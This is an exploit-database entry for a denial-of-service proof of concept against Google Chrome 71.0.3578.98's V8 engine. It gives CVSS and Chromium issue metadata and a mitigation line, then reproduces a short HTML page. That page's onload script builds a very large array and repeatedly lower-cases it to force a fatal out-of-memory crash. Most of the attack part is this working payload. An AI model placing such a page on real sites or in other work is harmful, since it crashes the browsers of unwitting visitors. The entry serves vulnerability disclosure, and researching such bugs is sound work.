Google Chrome 71.0.3578.98 V8 JavaScript Engine - Out-of-memory. Denial of Service (PoC)

vendor:

Google Chrome

by:

Bogdan Kurinnoy

7.5

CVSS

HIGH

Out-of-memory Denial of Service

400

CWE

Product Name: Google Chrome

Affected Version From: Google Chrome 71.0.3578.98

Affected Version To: Google Chrome 71.0.3578.98

Patch Exists: YES

Related CWE: N/A

CPE: a:google:chrome

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows x64

2018

Google Chrome 71.0.3578.98 V8 JavaScript Engine – Out-of-memory. Denial of Service (PoC)

A fatal javascript Out-of-Memory (OOM) vulnerability exists in the CALL_AND_RETRY_LAST function of the V8 JavaScript Engine in Google Chrome 71.0.3578.98. An attacker can exploit this vulnerability to cause a denial of service condition. This vulnerability is tracked in Chromium as issue 917631.

Mitigation:

Upgrade to the latest version of Google Chrome.

Source

Exploit-DB raw data:

<!--
# Exploit Title: Google Chrome 71.0.3578.98 V8 JavaScript Engine - Out-of-memory. Denial of Service (PoC)
# Google Dork: N/A
# Date: 2018-12-23
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://www.google.com/
# Version: Google Chrome 71.0.3578.98, V8 version 7.3.0 (candidate)
# Tested on: Windows x64
# CVE : N/A

# Description:

# Fatal javascript OOM in CALL_AND_RETRY_LAST

# https://bugs.chromium.org/p/chromium/issues/detail?id=917631
-->

<html>
<head>
<script>

function main() {

var vArr = new Array();
var bigArray = new Array(0x20000000);
vArr[0] = String.prototype.toLowerCase.call(bigArray);
vArr[1] = String.prototype.toLowerCase.call(bigArray);
vArr[2] = String.prototype.toLowerCase.call(bigArray);

}
</script>
</head>
<body onload=main()></body>
</html>